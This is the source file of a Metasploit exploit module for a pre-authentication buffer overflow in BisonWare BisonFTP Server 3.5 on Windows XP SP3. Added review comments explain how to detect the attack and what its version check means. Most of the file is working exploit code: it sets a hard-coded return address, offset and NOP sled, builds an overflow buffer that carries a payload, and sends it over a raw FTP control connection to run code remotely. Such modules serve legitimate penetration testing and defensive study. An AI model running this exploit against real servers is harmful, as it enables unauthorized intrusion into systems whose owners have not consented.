GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ftp/bison_ftp_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit remote exploit module for the buffer overflow in BisonWare
# BisonFTP Server 3.5 (see 'Name' and 'Description' below). It mixes in
# Msf::Exploit::Remote::Ftp, which supplies connect, connect_login,
# disconnect, sock and banner.
#
# Reviewer summary for defenders:
# * check only compares the FTP banner; it never exercises the overflow.
# * exploit sends its data as a raw write on a fresh connection, without
#   logging in and without any FTP command on that connection.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp

  # Registers the module metadata: references, payload constraints and the
  # single supported target.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'BisonWare BisonFTP Server Buffer Overflow',
      'Description' => %q{
        BisonWare BisonFTP Server 3.5 is prone to an overflow condition.
        This module exploits a buffer overflow vulnerability in the said
        application.
      },
      'Platform' => 'win',
      'Author' =>
        [
          'localh0t', # initial discovery
          'veerendragg @ SecPod', # initial msf
          'Jay Turla' # msf
        ],
      'License' => MSF_LICENSE,
      # NOTE(review): the CVE id is from 1999 while DisclosureDate below is
      # 2011-08-07 -- confirm which advisory this module is meant to track
      # before using the id for asset or patch correlation.
      # NOTE(review): the URL reference is plain http; content fetched from it
      # has no transport integrity.
      'References' =>
        [
          [ 'CVE', '1999-1510'],
          [ 'BID', '49109'],
          [ 'EDB', '17649'],
          [ 'URL', 'http://secpod.org/msf/bison_server_bof.rb']
        ],
      'Privileged' => false,
      'DefaultOptions' =>
        {
          # Verbose output is switched on by default for this module.
          'VERBOSE' => true
        },
      'Payload' =>
        {
          # At most 310 bytes of encoded payload; NUL, LF and CR are excluded
          # from it.
          'Space' => 310,
          'BadChars' => "\x00\x0a\x0d",
          'StackAdjustment' => -3500,
        },
      # One target only: the address and sizes below are hard-coded for the
      # named product on Windows XP SP3 EN. Nothing here covers other builds.
      'Targets' =>
        [
          [ 'Bisonware FTP Server / Windows XP SP3 EN',
            {
              'Ret' => 0x0040333f,
              'Offset' => 1028,
              'Nops' => 404
            }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2011-08-07'))
  end

  # Banner-based version check.
  #
  # Logs in through the Ftp mixin, disconnects, then tests the banner against
  # the "BisonWare BisonFTP server product V3.5" string (case-insensitive).
  #
  # NOTE(review): connect_login performs an FTP login, so a check run should
  # show up in the server's authentication log if login logging is enabled.
  # NOTE(review): Safe is returned for any banner that does not match,
  # including a missing or customised banner, so Safe here is not evidence
  # that a host is patched; Appears only means the version string matched.
  #
  # @return [Exploit::CheckCode] Appears when the banner matches, else Safe
  def check
    connect_login
    disconnect
    # Regexp#=== is false for a nil banner, so that case falls to Safe.
    if /BisonWare BisonFTP server product V3\.5/i === banner
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Delivers the payload over two consecutive connections.
  #
  # The first connection writes an empty string and disconnects; per the
  # status message this is meant to trigger the unregistered-product prompt.
  # The second connection writes a single buffer and then hands over to the
  # payload handler.
  #
  # Detection note: neither connection logs in (connect, not connect_login),
  # and the buffer goes out through sock.put with no FTP command on that
  # connection. With the listed target its length is Offset + Nops + 4 bytes,
  # i.e. one long pre-authentication write on the FTP control port, preceded
  # by a short-lived connection from the same client.
  def exploit
    connect
    print_status('Triggering the prompt for an unregistered product')
    sock.put('')
    print_status('Disconnecting...')
    disconnect

    print_status('Connecting for the second time to deliver our payload...')
    connect # second connection; again without login

    # Buffer layout, in order: Offset random alphabetic bytes, the encoded
    # payload, NOP padding, then the target address as a 32-bit
    # little-endian value.
    buf = rand_text_alpha(target['Offset'])
    buf << payload.encoded
    # Pads payload + NOPs to exactly target['Nops'] bytes. The count stays
    # non-negative because 'Space' (310) is below 'Nops' (404).
    buf << make_nops( (target['Nops']) - payload.encoded.length)
    buf << [target.ret].pack('V')
    print_status('Sending payload...')

    sock.put(buf)
    handler
    disconnect
  end
end